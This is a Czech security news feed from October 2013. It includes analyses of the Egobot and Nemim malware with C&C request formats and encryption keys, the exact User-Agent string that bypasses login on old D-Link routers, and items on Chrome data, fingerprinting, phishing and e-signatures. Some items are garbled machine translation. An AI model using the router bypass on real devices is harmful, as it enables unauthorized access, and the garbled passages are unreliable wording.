Vypadá to, že většina uživatelů se neobtěžují otevření zprávy s tradiční farmaceutické spam témat, takže spammeři se obrátil na druhu triků spojených s phisherů. Zatímco zatemnil odkazy používané spammery může být viděno jako méně škodlivá než trestné činy phisherů kteří nalákat uživatele na podvodné stránky nebo škodlivé soubory, doporučujeme být velmi opatrní při otevírání nějaké oficiální vypadající e-maily a neklikejte žádné odkazy uvnitř těchto zpráv.
Backdoor.Egobot: Jak efektivně provést cílenou kampaň
15.10.2013 Viry
Backdoor.Egobot je Trojan používané v kampaních cílených na korejské zájmy. Provedení kampaně je jednoduchá a efektivní. Symantec údaje naznačují, že kampaně je v provozu od roku 2009. Egobot se postupně vyvíjely přidáním novější funkce. Útočníci používají čtyři zlatých pravidel cílené kampaně:
Identifikace cílů
Exploit cíle (aby pokles užitečného zatížení)
Proveďte škodlivou činnost (v takovém případě, krást informace)
Zůstanou neodhaleny
Také jsme odhalili paralelní kampaň, která byla v provozu již v roce 2006, které se bude vztahovat na jiný blog .
Egobot cíle
Egobot je zaměřen na pracovníky pracující pro korejské společnosti, a také na pracovníky, kteří podnikají s Koreou. Industries zaměřené na Egobot patří:
Finance a investice
Infrastruktura a rozvoj
Vládní agentury
Armádní dodavatelé
Cíle jsou umístěny po celém světě a patří Korea, Austrálie, Rusko, Brazílie a Spojené státy.
Cílem kampaně je Egobot krást důvěrné informace z napadených počítačů.
Vykořisťování
Útočníci shromažďovat informace o svých cílů s využitím techniky sociálního inženýrství před láká je do pasti. Cíle jsou poslala oštěp phishing e-mail, často předstírá, že být poslán od osoby, které již znají. Oštěp phishing e-mail obsahuje relevantní nebo lákavé zprávu do cíle, což je nutí k otevření nebezpečného přílohu. Škodlivý příloha může být zkratka. Lnk soubor, který odkazuje na soubor umístěn na GeoCities Japonsko.
Různé škodlivé přílohy byly použity v této kampani:
LNK soubory.: Viděli jsme tuto taktiku použít, aniž by však tyto útočníci také použít Microsoft HTML Application (Mshta) ke stažení jiného souboru do systému.
Doc. Soubory: Využívá následující chyby:
Microsoft Office RTF souboru Stack Přetečení vyrovnávací paměti (CVE-2010-3333)
Adobe Flash Player "FSM" Soubor Remote Chyba zabezpečení poškození paměti (CVE-2011-0609)
NsP. Soubory: Obsahuje skript, který stáhne škodlivý soubor
Při otevření přílohy se spustí následující třístupňový proces stahování:
Krok 1: Stáhněte si popletl HTML soubor
Každá z příloh ke stažení malware z webů hostovaných na geocities Japonsku. Soubory se liší, ale obvykle s názvem Aktualizace RRRRMM []. Xml, který je popletl HTML soubor, který klesá spustitelný v systému.
Krok 2: Stáhněte RAR archiv
Klesl spustitelný z 1. etapy načítá jiný soubor z GeoCities Japonsko. Tento soubor je oprava hotfix [RRRRMM]. Xml, který je spustitelný soubor RAR. Oba stažené soubory v prvních dvou fázích se tváří jako dokumenty XML ve snaze projít jako čistý soubor.
Fáze 3: Stáhnout zadní dveře složka
Spustitelný soubor RAR je odpovědný za přípravu systému. Padne sadu souborů, které jsou odpovědné za přesouvání souborů kolem, vstřikování komponenty do procesů, a krást následující informace o systému:
Verze pro Windows
Instalovaná verze aktualizace service pack
Instalace jazyka
Uživatelské jméno
Ukradené informace jsou odeslány do Egobot je velení a řízení (C & C) serveru v následujícím formátu:
/ Micro / advice.php? Arg1 = 1irst & arg2 = [base64 řetězec]
/ Micro / advice.php? Arg1 = 1irst & arg2 = [HASH] & arg3 = [base64 řetězec]
Data, která je odeslána zpět do C & C je šifrována pomocí rotujícího klíč vložený uvnitř malware. Sledovali jsme následující dva konkrétní klíče:
youareveryverygoodthing
allmyshitisveryverymuch
Konečně, spustitelné rar soubor ke stažení jeden z Poslední složkou GeoCities Japonsko. Tento stažený soubor je pojmenován pomocí hodnoty arg1 v GET příkazu zaslaného C & C. V tomto případě Egobot pokusí stáhnout soubor s názvem 1irst.tmp, což je hlavní náklad.
Krádež informací
Hlavní náklad má specifické funkce, které jsou potenciálně katastrofální pro cílené obchodní vedení. Tyto funkce zahrnují:
Nahrávání videa
Nahrávání zvuku
Snímání screenshotů
Nahrávání souborů na vzdáleném serveru
Získání nejnovější seznam dokumentů
Hledání řetězec nebo vzor v souboru
Mazání a nastavování body obnovení
Ukradené informace jsou odeslány na vzdálené servery hostované v Malajsii, Hongkongu a Kanadě. Útočníci také aktualizovala své kód patří 64-bitové verze, aby hladce přes 64-bitové platformy.
Zůstat pod radarem
Egobot jsou přenesena do systému jako svázaný RAR archiv s různými komponenty balených používat komerční Packers exe32pack a UPX. Tyto lze použít následující součásti k zamaskování přítomnosti škodlivého softwaru:
Detoured složka: Backdoor.Egobot je sestaven s použitím starší verze Microsoft objížděk funkčnost softwarového balíku, který zahrnuje Detoured.dll souboru. Tento soubor se používá k upevnění škodlivé. Dll soubory legitimní Win32 binaries. Egobot Tento soubor můžete použít ke spuštění se v paměti legitimního procesu, maskující se jako čistý proces.
Koordinátor komponenty: Připravuje souborů jejich přesunutím do příslušných složek a vstřikování je do legitimních procesů. Backdoor.Egobot se obvykle aplikuje do explorer.exe, subst.exe a alg.exe procesů.
Timer funkce: Některé verze zadní dveře složky patří časovač funkce, takže můžete odstranit Trojan se po určitém datu. Tato funkce odstraní všechny stopy Backdoor.Egobot.
Zákazníci Symantec jsou chráněny Symantec Email Security.cloud . Škodlivé vzorky z této kampaně jsou detekovány jako trojského koně , Trojan.dropper , Trojan.Mdropper a Backdoor.Egobot .
A, bohužel, tam je více k tomuto příběhu. Prostřednictvím našeho výzkumu Egobot společnost Symantec identifikovala paralelní provoz související s Egobot, která působí od roku 2006, o tři roky před Egobot. Další podrobnosti o Nemim kampaně včetně jeho vztahu k Egobot kampaně jsou vysvětleny v samostatném blogu, Infostealer.Nemim: Jak Všudypřítomná Infostealer se stále vyvíjí
Infostealer.Nemim: Jak Všudypřítomná Infostealer dále vyvíjet
15.10.2013 Viry | Hacking
Dříve jsme blozích Backdoor.Egobot a nastínil, jak se zaměřuje na konkrétní odvětví a současně udržuje nízký profil. Mezi zločinci za sebou Egobot také vyvinuli Infostealer.Nemim pro rozšíření a převládající kampaně. I přes rozdíly v rozsahu, jak hrozby krást informace z napadených počítačů, a existují náznaky, tyto dvě hrozby pocházejí ze stejného zdroje.
Nemim komponenty
Symantec zjistil Nemim ve volné přírodě již na podzim roku 2006. Jeden z prvních vzorků obsahovalo časovače mechanismus pro určení, kdy se odstranit z napadeného počítače. Odstranění bylo podmíněno a vázáno na pevné datum, nebo na základě počtu případů, kdy byl vzorek provést. Časovač mechanismus funkce byla také nalezena ve vzorcích Egobot.
V Nemim vzorky jsme analyzovali byly digitálně podepsány s ukradenými certifikáty a po čase byl malware aktualizován tří složek:
Infektor složka
Downloader složka
Informace zloděj složka
Infektor složka
Infector komponenta je navržena tak, aby infikovat spustitelné soubory v určitých složkách. Zejména se zaměřuje na infector% USERPROFILE% složku a všechny její podsložky.
Infekce není propracovanější. Nemim zkopíruje do nové části s názvem. Rdat kdy ve spodní části infikovaného souboru. Původní vstupní bod z infikovaného souboru se mění, aby se poukázat na Nemim kódu v. Rdat části. Infekce kód je zodpovědný za dešifrování klesá a běží vložený spustitelný soubor v následující cestě:
AllUsersProfile%% \ Application Data \ Microsoft \ Display \ igfxext.exe
Tento soubor je vykonán součást downloader.
Downloader složka
Komponenta Downloader slouží jako obálka pro šifrovaný spustitelný soubor. Po dešifrování je šifrovaný spustitelný soubor načten dynamicky. Tento šifrovaný spustitelný soubor obsahuje aktuální downloader funkčnost. Nicméně, před stažením, malware sklizně následující informace o systému z napadeného počítače:
Název počítače
Uživatelské jméno
CPU jméno
Operační systém verze
Počet zařízení USB
Místní adresa IP
MAC adresa
Tento sklizené informace šifrována, konvertoval k Base64, a poslal na velení a řízení (C & C) serveru, stejně jako Egobot. Sklizené informace zobrazitelné na C & C serveru v nešifrované podobě. Například proměnná P2Pdetou zobrazí název počítače a uživatelské jméno: [Název počítače] @ [jméno uživatele]. Server pak odpoví základních příkazů, včetně užitečného zatížení, který je přetažen a popraven. Downloader pak očekává, že server odpoví "minmei" string doprovodu z následujících příkazů:
nahoru
re
ne
Do příkazu, například vyplývá, že se stažená data obsahuje spustitelný náklad, který Downloader dešifrovat a běh.
Informace zloděj složka
Informace zloděj komponenty mohou krást uložená pověření účtu z následujících aplikací:
Internet Explorer
Mozilla Firefox
Google Chrome
Microsoft Outlook
Outlook Express
Windows Mail
Windows Live Mail
Gmail Notifier
Google Desktop
Google Talk
MSN Messenger
Informace zloděj ukradl pošle data zpět do C & C serveru a stejně jako downloader, očekává "minmei" řetězec v odpovědi.
Zeměpisné rozložení a ochrana
Japonsko a Spojené státy jsou hlavní cíle Nemim, následované Indií a Spojeným královstvím.
Symantec detekuje všechny komponenty těchto hrozeb pro ochranu zákazníků před útoky:
Infostealer.Nemim
Infostealer.Nemim! Inf
Downloader.Nemim! Gen1
W32.Nemim
Nemim a Egobot připojení
Analýza Nemim binární ukázal připojení k Backdoor.Egobot z několika podobnosti u obou hrozeb.
Nemim
Egobot
Informace shromážděné v určitých formátech pomocí specifické značky
Sys @ Uživatel:% s @% s (% s)
CPU:% s
Systém OS:% s (% s)
Čistá karta:% s (% s)
Sys @ Uživatel:% s @% s (% s)
CPU:% s
Systém OS:% s (% s)
Čistá karta:% s (% s)
Informace o šifrování
Šifrované a base64
Šifrované a base64
C & C komunikační formát
[URL / IP] / [cesta] / [SOUBOR]. Php? A1 =
% s & a2 =% s & a3 =% s
[URL / IP] / [cesta] / [SOUBOR]. Php? Arg1 =
% s & arg2 =% s & arg3 =% s
Kód injekční technika
Microsoft objížďky funkce
(první verze)
Microsoft objížďky funkčnost
(všechny verze)
Na základě těchto podobností a překrývající se časové osy obou kampaní, že je zřejmé, že Nemim a Egobot pocházejí ze stejného zdroje.
Potenciál pro nové kampaně
Nemim funguje i dnes a účinně se v průběhu času. Například řetězec šifrování se stal non-triviální, že ukradené digitální certifikáty byly modernizovány s novějšími, a tam jsou nyní kontroly na místě pro detekci běžných virtuálních strojů. Opravdu, za posledních sedm let útočníci ukázaly neochvějné odhodlání k inovacím a vyvinuli malware, který je adaptabilní, aby vyhovovaly potřebám dvou různých útočných kampaní. Očekáváme, že tento trend bude pokračovat inovovat s vysokým potenciálem pro nové kampaně.
Staré firmy D-Link routery s kódovaným backdoor
14.10.2013 Zranitelnosti
Chyba se objevila ve staré D-Link routerů, která umožňuje útočníkovi získat oprávnění správce ve směrovači. Následující modely jsou ovlivněny:
DIR-100
DI-524
DI-524UP
DI-604S
DI-604UP
DI-604 +
TM-G5240
DIR-615
Pokud váš uživatelský agent je nastaven na xmlset_roodkcableoj28840ybtide , budete moci prohlížet a měnit nastavení zařízení. K dnešnímu dni D-Link není zaslali řešení. Máte-li jakékoli bezdrátový směrovač odpovídající zranitelné modely, musíte:
Zabraňte neoprávněnému přístupu k bezdrátové síti: Použít WPA2 s klíčem delší než 10 bajtů a náhodné. To sníží šance na hrubou silou k routeru.
Ujistěte se, že umožnění přístupu k bezdrátové síti s někým, komu důvěřujete, zatímco DLINK zveřejní opravu, protože nelze určit jednu IP adresu pro účely admin ;)
Když DLINK psát řešení, možná budete chtít, aby zajistily, že nepoužíváte žádné výchozí heslo správce. Podívejte se zde na výchozí bezdrátového směrovače hesel a podívejte se na reference DLink. Máte-li výchozí heslo, zaškrtněte tuto stránku hledat informace o tom, jak přistupovat k admin nástroj pro změnu hesla.
Některé staré routery od D-Linku lze velmi snadno prolomit
14.10.2013 Zranitelnosti
Některé starší routerty od D-Linku lze velmi snadno prolomit. Útočník se může do jejich administrace dostat i bez znalosti hesla. Přesvědčil se o tom jeden z autorů blogu Devttys0.com, který analyzoval firmware verze 1.13 pro router DIR-100 revA.
V kódu systému objevil zvláštní textový řetězec „xmlset_roodkcableoj28840ybtide“ a podmínku, která vpustila každého návštěvníka do webové administrace routeru i bez hesla, pakliže měl tuto hodnotu klient nastavenou v hlavičce User-agent.
Do webové administrace vybraných routerů od D-Linku se dostane každý člen sítě i bez znalosti hesla správce
Nejedná se o žádná zadní a třeba i servisní vrátka autorů firmwaru, ale o zadní vrátka některých autonomních služeb routeru, které se pomocí této HTTP hlavičky mohou dostat přímo ke konfiguraci, aniž by znaly login a heslo správce routeru.
Tato zadní vrátka se týkají několika dalších starších modelů od D-Linku a seznam na blogu jistě stále není kompletní. Pokud tedy doma máte také router od D-Linku a zvládnete změnit podpis svého prohlížeče, tento hack si můžete vyzkoušet a ověřit v praxi, jestli se náhodou netýká i vás.
Nezbývá než doufat, že se výrobce poučil a stejně tak ostatní dnes nic podobného nepoužívají, na světě je totiž poměrně hodně crackerů, kteří se po večerech baví reverzní analýzou kódu prakticky jakékoliv aplikace. Je s podivem, že s tím D-Link očividně vůbec nepočítal.
Experti kritizují Chrome. Snadno vyzradí některé tajné informace
14.10.2013 Zabezpečení
Bezpečnostní firma IdentityFinder si vzala na paškál prohlížeč Chrome a provedla na něm hloubkovou analýzu všemožných dat, která se ukládají do lokální paměti na počítači. Experti přišli na to, že databáze s webovou cachí a historií navštívených adres obsahují hromadu zajímavých informací bez jakéhokoliv šifrování.
Analýzou počítačů zaměstnanců získali čísla sociálního pojištění (USA), čísla kreditních karet a další citlivé údaje. Podle uživatelů konkrétních počítačů však tyto citlivé informace vyplňovali jen na stránkách se zabezpečeným SSL spojením. Prohlížeč samotný ale data z šifrovaného spojení sám o sobě nijak nezabezpečuje a v systému se k nim chová stejně jako k ostatním.
Nešifrovaný Chrome.png
Expertům se podařilo z lokálních databází Chromu na PC vydolovat údaje, které surfař zadával během šifrovaného SSL spojení a měly by tedy být lépe zabezpečené.
Základní obhajobou Googlu, kterou použil i v létě, když si mnozí uživatelé stěžovali, že dostatečně nezabezpečuje ani uložená hesla na počítači, byl argument, že počítač samotný si musí každý zabezpečit sám. Pokud se tedy útočník dostane do systému, k datům získá přístup tak jako tak. Kdyby se mu podařilo stáhnout zabezpečené databáze, může je zkopírovat a hrubou silou dekódovat třeba na farmě grafických karet.
Přesto ale zůstává otázkou, proč jim to co nejvíce nezkomplikovat a proč alespoň základním šifrováním na straně prohlížeče nezamezit v přístupu k datům běžným útočníkům, kolegům v práci. Google se pro The Verge vyjádřil v tom smyslu, že data bezpečně šifruje na Chrome OS a Androidu, nezmínil ale, proč to samé nedělá i na ostatních platformách.
Internetové stránky "otisků prstů" uživatelé tajně shromažďování prohlížeče info
14.10.2013 Zabezpečení | Bezpečnost | Sledování
Skupina evropských vědců zveřejnila výsledky svého výzkumu, kolik z nejnavštěvovanějších internetových stránek sledovat uživatele bez jejich vědomí pomocí "zařízení otisků prstů", a odpověď je 145 z 10000. "V moderní web , prohlížeč se ukázalo jako vozidlo volby, které uživatelé mají věřit, upravovat a používat pro přístup k množství informací a on-line služeb Nicméně, nedávné studie ukazují, že prohlížeč může být také použit k invisibly otisku prstu uživatele.: praxe, která může mít vážné soukromí a bezpečnostní souvislosti, "oni si všimli. Zařízení (nebo v tomto případě prohlížeč) otisků prstů se odkazuje na praxi shromažďování atributy o zařízení / prohlížeč - například přístroje velikosti obrazovky, verze nainstalovaného softwaru, a seznam nainstalovaných písem, atd. -. uživatel používá a používat to, aby zcela nebo částečně identifikovat uživatele / zařízení , ale zároveň tato praxe může být skvělé pro prevenci krádeže identity online, podvody s kreditními kartami, nebo zmírnění DDoS útoky, může být také použit k vytvoření tajně uživatelské profily. Vědci vytvořili svůj vlastní rámec pro detekci a analýzu webových fingerprinters -. FPDetective "Tím Pokud použijeme naše rámce se zaměřením na postupy font detekce, jsme byli schopni provést rozsáhlé Analýza milionů nejpopulárnějších internetových stránek na internetu, a zjistil, že přijetí otisků prstů je mnohem vyšší, než předchozí studie odhadla, "oni si všimli. zda "fingerprinters" používat JavaScript nebo pluginy udělat otisky prstů, jde o to, že můžete sledovat on-line uživatelů činnost, i když jsou cookies vypnuty a uživatelé umožnily nesledují možnost na svých webových prohlížečů (pokud existuje). Většinu času, "otisky prstů" Skryté a těžko rozpoznat uživateli. "Device otisků prstů vzbuzuje vážné obavy týkající se soukromí pro běžné uživatele," výzkumníci poukázal. "Jeho povaha státní příslušnosti je těžké odhalit (žádné cookies, můžete zkontrolovat a odstranit), a ještě těžší opt-out. Navíc otisků prstů funguje stejně dobře v" soukromém režimu "moderních prohlížečů, které cookie uvědomělí uživatelé mohou být . použitím provést soukromí citlivé operace " Oni také ukázal, že dva protiopatření, které jsou využívány k obraně proti otisků prstů - Tor Browser a Firegloves, POC rozšíření prohlížeče, který vrací hodnoty randomizované Při dotazu na určitých vlastností - mají zneužitelné slabiny, které by je mohlo učinit k ničemu. Pro více informací o jejich výzkumu, podívejte se na podrobnou zprávu .
Yara pravidla pro unikly Kins nástrojů
14.10.2013 Viry | Kriminalita
Jen před pár dny, zdrojový kód slavného Kins byl Trojan bankovnictví unikly. Kins cílem infikovat co nejvíce počítačů, jak je to možné, aby se ukrást přihlašovací údaje kreditní karty, bankovní účet a související informace z obětí. Při pohledu jako náhrada Citadel , bylo zjištěno ve volné přírodě není to tak dávno. Nyní, může to vést k úniku nových variant malware a rodiny. V této výbavy najdeme všechny zdrojové kódy a zkompilované verze jednotlivých komponent, stejně jako webový panel pro správu botnet. XyliBox udělal dobrý rozbor balíčku . Po studiu součásti, jsme psali dva Yara pravidla tak, aby odpovídala kapátko a verze zeus použita jako bota. Yara je nástroj, jehož cílem je pomoci malware výzkumní pracovníci identifikovat a klasifikovat vzorků malwaru. můžete najít a volně používat v našem GitHub repozitáři. Autor: Alberto Ortega, výzkumný pracovník na AlienVault.
Neskutečná Facebook přihlašovací stránka krade přihlašovací údaje, tlačí malware
14.10.2013 Viry | Hacking | Kriminalita
Symantec vědci nedávno narazil na phishing, který skrývá dvojí pohroma: místo požádá uživatele buď přihlásit do Facebooku nebo stáhnout aplikaci, aby došlo k aktivaci fiktivní službu, která bude pravděpodobně dejte jim vědět, kdo navštívil svůj profil na Facebooku (tlačítko Na obrázku pro jeho zvětšení): Pro ty, kteří se rozhodnou pro první možnost a zadejte své přihlašovací údaje Facebook zpráva je špatná: své uživatelské jméno a heslo bylo zasláno na phisherů a bude pravděpodobně použita pro únos účtu oběti. Pro ty, kdo si vybral druhou možnost by zpravodajství mohlo být ještě hůř. Soubor ( WhoViewedMyfacebookProfile.rar ) nabízíme ke stažení obsahuje informace-krást Trojan, který může potenciálně shromažďovat všechny druhy důvěrných informací z počítače oběti a pachatele - včetně osobních, finančních a přihlašovací údaje pro různé on-line služeb - a je nastaven na odeslat tak na útočníkův e-mailovou adresu. Avšak, jak výzkumníci zjistili, že e-mailová adresa nebyla platná 3 měsíce, takže informace je poslán a ztratil na virtuální černé díry internetu. Přesto může malware dostat aktualizovány kdykoli a e-mailová adresa v otázce změněn na platný jeden. "Pokud uživatelé padl za oběť phishing zadáním své přihlašovací údaje, by phishingu úspěšně ukradl své informace za účelem krádeže identity , " vědomí vědci. K phishingu pověření, pak je samozřejmě poslal na servery ovládaných útočníků, a to na výše uvedený e-mailovou adresu. Ale ať už to phishing podvod je stil aktivní nebo ne není místo, protože jiné podobné ty se objevují každý den. Dobrá věc k zapamatování je, dávat pozor na to, kde zadáváte vaše bankovní údaje (vždy zkontrolujte, zda je adresa URL je správná, a nemusí sledovat odkazy z nevyžádaných e-mailů) a jaký software stáhnout (nepřijmete software, nepožádali o, a buďte opatrní při hledání software on-line - držet se stanovených místech ke stažení).
Elektronické podpisy s dlouhodobým ověřením
14.10.2013 Zabezpečení
Platnost elektronických podpisů se s časem nemění. Omezována v čase je pouze naše schopnost tuto platnost ověřit. Pokud ale použijeme vhodný formát elektronických podpisů, můžeme dobu jejich ověřitelnosti libovolně prodlužovat.
V předchozím dílu tohoto seriálu jsme si vysvětlili, proč je možnost ověřit platnost konkrétního elektronického podpisu zcela záměrně a programově omezována v čase: proč je vše nastaveno tak, aby ověření po určité době již nebylo možné. Tedy pokud včas neuděláme určitá opatření k tomu, abychom možnost ověření prodloužili. Důvodem je právě snaha vynutit si aplikaci takových opatření, která dokážou předejít možnost záměny podepsaného dokumentu nějakým kolizním dokumentem. Tedy dokumentem, který je jiný, ale má stejný otisk (hash), a tím i stejný elektronický podpis.
Jak již víme z minulého dílu, vhodným opatřením je časové razítko. Musíme jej ale přidat včas neboli ještě dříve, než skončí možnost ověření elektronického podpisu. Tím ji prodloužíme o určitou dobu (obvykle o několik málo let), ale opět ne natrvalo, resp. na libovolně dlouho. Proto ještě předtím, než takto prodloužená doba skončí, musíme přidat další časové razítko. A po čase zase další atd.
Další překážky
Pokud budeme popisovaným způsobem přidávat časová razítka, vyřešíme tím ale jen část celého problému: pouze tu, která se týká nebezpečí záměny původně podepsaného dokumentu nějakým kolizním dokumentem. Dalším nepříjemným problémem je to, že po delší době již nemusí být k dispozici všechny „podklady“, které k ověření platnosti podpisu nutně potřebujeme.
Připomeňme si, že než můžeme nějaký podpis prohlásit za platný, musíme zkontrolovat integritu podepsaného dokumentu. Pak musíme zvolit tzv. posuzovaný okamžik, ke kterému budeme platnost podpisu ověřovat (viz minulý díl). To je v praxi okamžik uvedený v nejstarším kvalifikovaném časovém razítku. No a pak musíme ověřit, že certifikát, na kterém je podpis založen („podpisový“ certifikát), byl k posuzovanému okamžiku stále ještě platný a nebyl k tomuto okamžiku revokovaný neboli předčasně zneplatněný. To samé pak musíme ověřit pro všechny nadřazené certifikáty, což jsou v praxi certifikáty certifikační autority, která vydala „podpisový“ certifikát.
Problém ale nastává v případě, kdy některý z těchto certifikátů nemáme k dispozici. Bývá sice zvykem je přikládat k samotnému podpisu, ale není to podmínkou. Ovšem pro možnost ověření platnosti podpisu je dostupnost certifikátů nezbytná. Takže bez nich platnost podpisu ověřit nemůžeme.
V praxi ale bývá větší problém s nedostupností informací o revokaci příslušných certifikátů. Přitom ověření toho, že žádný z certifikátů nebyl k posuzovanému okamžiku revokován, je další nutnou podmínkou k tomu, abychom nějaký podpis mohli prohlásit za platný. Takže ani bez informací o revokaci se opravdu neobejdeme.
Vložené revokační informace
Jak již víme z předchozích dílů, informace o revokaci certifikátů mohou být zpřístupňovány dvěma způsoby: skrze tzv. CRL seznamy, vydávané dávkově (tj. „jednou za čas“), nebo v reálném čase skrze protokol OCSP (Online Certificate Status Protocol) na principu dotaz/odpověď. V obou případech ale platí, že jejich dostupnost není věčná. Není garantováno, že příslušné informace budou bez problémů dostupné i po více letech. V případě první varianty (CRL seznamů) se stávají nedostupnými dokonce velmi brzy. Jakmile skončí řádná doba platnosti certifikátu, jsou informace o jeho eventuální revokaci vyřazeny z aktuálního seznamu CRL.
Naštěstí existuje poměrně jednoduché řešení problému s jejich nedostupností po delší době, a to získat revokační informace (ať již v podobě CRL seznamu či odpovědi OCSP serveru) v době, kdy jsou ještě dostupné, a „přibalit“ je k samotnému podpisu, podobně jako se k němu obvykle připojuje podpisový certifikát a další jemu nadřazené certifikáty. Dokonce to může být provedeno i později, až po vzniku podpisu. A může tak učinit kdokoli, nejenom podepsaná osoba. Například ten, kdo elektronický dokument získal, od toho, kdo jej podepsal.
Způsob, jakým se revokační informace „přibalují“ k elektronickému podpisu, je samozřejmě závislý na používaném programu, ale obvykle je vše záležitostí několika málo kliknutí. Dokonce je možné i to, aby revokační informace byly přidávány k podpisu automaticky již při jeho vzniku. Zde je ale jeden velký háček. V případě, kdy je takto přidáván aktuálně dostupný CRL seznam, je nutné si uvědomit, že ještě nemusí obsahovat informace o revokacích, ke kterým došlo těsně před vznikem podpisu. Vzhledem k tomu, jak vydávání CRL seznamů funguje a jaké lhůty klade zákon na zveřejnění informací o revokaci, je třeba počkat nejméně 24 hodin a teprve pak přidat aktuální CRL seznam (tj. seznam vydaný nejméně 24 hodin po vzniku podpisu).
Koncept LTV
Přidávání („přibalování“) všeho potřebného, co je nezbytné pro pozdější ověření platnosti elektronického podpisu, je základem konceptu LTV (Long Term Validation) neboli elektronických podpisů s možností dlouhodobého ověření. Nejde skutečně o nic jiného než o přidávání všech relevantních certifikátů a revokačních informací ještě v době, kdy jsou dostupné – a jejich následné využití tehdy, kdy je platnost ověřována. Pochopitelně přitom musí být vyřešeno i to, jak certifikáty a revokační informace k podpisům „přibalovat“. Musí tedy být použity takové formáty elektronických dokumentů a podpisů, které to umožňují. Které vytvářejí jakýsi „kontejner“, do něhož lze kromě samotného podpisu (a časového razítka, resp. razítek) přidat i certifikáty a revokační informace, ať již v podobě CRL seznamů či odpovědí OCSP serverů.
Samozřejmě také musí být zajištěny celistvost a neměnnost celého podepsaného dokumentu i s příslušným „kontejnerem“, tak aby nikdo nemohl zaměnit původně podepsaný dokument jiným (kolizním) dokumentem nebo vložený certifikát jiným (kolizním) certifikátem atd. Toho docílíme opakovaným přidáváním časových razítek, viz úvod článku.
Manažer bezpečnosti: Manažeři nedodržují pravidla
14.10.2013 Zabezpečení
Zásady zabezpečení fungují nejlépe, když platí stejně pro všechny ve firmě. Samozřejmě se ale vždy najdou lidé, kteří si myslí, že by měli být výjimkou.
Co řešit: Vedoucí manažeři chtějí výjimky z nastavených bezpečnostních pravidel.
Akční plán: Udělat vše pro to, aby se pravidla bez rozdílu dodržovala.
Co dělat, když manažer vaší firmy trvá na přístupu, který ale porušuje podniková pravidla zabezpečení? Tento týden jsem na takový problém narazil. Náš vysoký manažer se rozhodl, že nechce být omezován stejnými bezpečnostními zásadami, jež musí dodržovat i ostatní.
Takový přístup není ničím novým – vedoucí pracovníci často mají speciální výjimky, pravděpodobně proto, že mají nějaký přímý vliv na IT rozpočet a zdroje. Ale toto je poprvé, kdy jsem podobné přání slyšel vyslovit nahlas.
Výsady manažerů se obvykle diskutují tiše, v zákulisí a na chodbách, protože pro řadové zaměstnance je demoralizující slyšet, že VIP podléhají jinému standardu než zbytek firmy. Zvláštní privilegia proto bývají malým, a často ne zcela čistým tajemstvím.
Popíši vám, co se přihodilo. Zmiňovaný manažer chtěl stáhnout program z internetu, aby ho mohl nainstalovat na svém notebooku. Naše pravidla ale lidem v této činnosti brání.
Myslím si, že je to poměrně normální situace v naprosté většině firem – vzhledem k dlouhé řadě rizik spojených s náhodnými internetovými aplikacemi, jimiž může být malware. Nebezpečím je také případné nedodržení licencí a dalších předpisů.
Systém webových filtrů, který využíváme, mu tedy stahování instalátoru softwaru zablokoval. On poté kontaktoval naši technickou podporu, jejíž personál byl vyškolen pro vyřizování žádostí o výjimky. Až potud vše probíhalo standardně. Technická podpora nabídla, že našemu váženému VIP software stáhne. Samozřejmě by se to muselo schválit, ale je to první návrh řešení – zajistit žadatelům, co potřebují, ale bez poskytnutí příslušného přístupu.
V tomto místě se však situace začala vyvíjet zcela špatným směrem. Manažer instalátor nabízený technickou podporou odmítl. Tvrdil, že on a ostatní manažeři by žádná omezení svých aktivit při práci s internetem neměli mít! Požadoval pro svůj účet úplné odblokování kategorie stahování. V rámci celého rozhovoru byl arogantní a neprofesionální (podle mého názoru, ke kterému jsem dospěl po přečtení proběhlé e-mailové korespondence) – v podstatě vyhrožoval zástupci technické podpory, který se zachoval profesionálně.
Zástupce helpdesku tedy přistoupil k další úrovni výjimek, a tou je vyplnění formuláře se žádostí o odblokování kategorie, jak bylo požadováno. Abych byl upřímný, já bych tuto žádost nechtěl schvalovat. Nedostal jsem ale šanci, protože se manažer rozzlobeně s odpovědnými pracovníky rozloučil s odvoláním na své postavení. Mohl postupovat standardně, ale namísto toho trval na své představě nepodléhat pravidlům.
V tento okamžik tedy technická podpora postoupila incident mně. Rychle jsem pročetl e-maily a byl jsem opravdu šokován chováním a vystupováním někoho, kdo by se měl chovat jako profesionál a zástupce naší společnosti. Přeposlal jsem tedy elektronickou korespondenci svému šéfovi, jímž je náš CIO, s poznámkou, že by bylo dobré si o přístupu tohoto manažera promluvit. Čekal jsem, že následující den budeme diskutovat o způsobu, jak přesvědčit dotyčného manažera, aby přestal vyhrožovat technické podpoře a vybral si k jednání někoho na své úrovni.
Mýlil jsem se. CIO okamžitě poslal odpověď dotyčnému manažerovi a požádal ho, aby si se mnou promluvil o našem „nefunkčním procesu“. Namísto toho, aby podpořil mě, šéf začal uklidňovat rozhněvaného VIP. Měl bych tím být překvapen? Asi ne. Naše bezpečnostní pravidla jsou však opravdu solidní. Byla to první věc, kterou jsem vytvořil, když jsem do naší společnosti nastoupil jako šéf informační bezpečnosti.
Ty schválil a následně podepsal i náš CIO. Dokážu pochopit, že může existovat skrytá vysoce privilegovaná třída v rámci naší společnosti, jejíž členové si myslí, že se na ně tato pravidla nevztahují. Nečekal jsem ale tak silný odpor, zejména vůči tak naprosto běžné zásadě, pro kterou navíc existuje přiměřený proces udělování výjimek.
Dobré alespoň bylo, že šéf nepřeposlal zmíněnému manažerovi ve své reakci na „nefunkční proces“ i můj komentář o „jeho přístupu k problému“. Prozíravě tuto část smazal. Myslím si tedy, že situace není tak špatná, jak by mohla být. Nebylo by ale hezké žít ve světě, kde se lidé chovají profesionálně a šéfové IT si stojí za dodržováním svých zásad zabezpečení, které platí pro každého?
Řada velkých webů tajně sleduje uživatele
14.10.2013 Sledování | Bezpečnost
Výzkum Luevenské univerzity ukázal, že 145 z největších webů sleduje uživatele bez jejich souhlasu pomocí skrytých skriptů, které dokáží jednoznačně identifikovat použitá zařízení.
Technologie otisků prstů (device či browser fingerprinting) je metoda, která na základě sběru vlastností PC, chytrých telefonů a tabletů dokáže identifikovat a sledovat uživatele. Mezi takové vlastnosti patří velikost obrazovky, verze nainstalovaných programů a modulů plugin a seznam písem dostupných v systému. Studie EFF (Electronic Frontier Foundation) z roku 2010 ukázala, že pro naprostou většinu prohlížečů je kombinace těchto parametrů zcela jedinečná a uživatele lze tak kdykoli identifikovat bez nutnosti využívat technologie cookie, kterou navíc lze snadno zakázat.
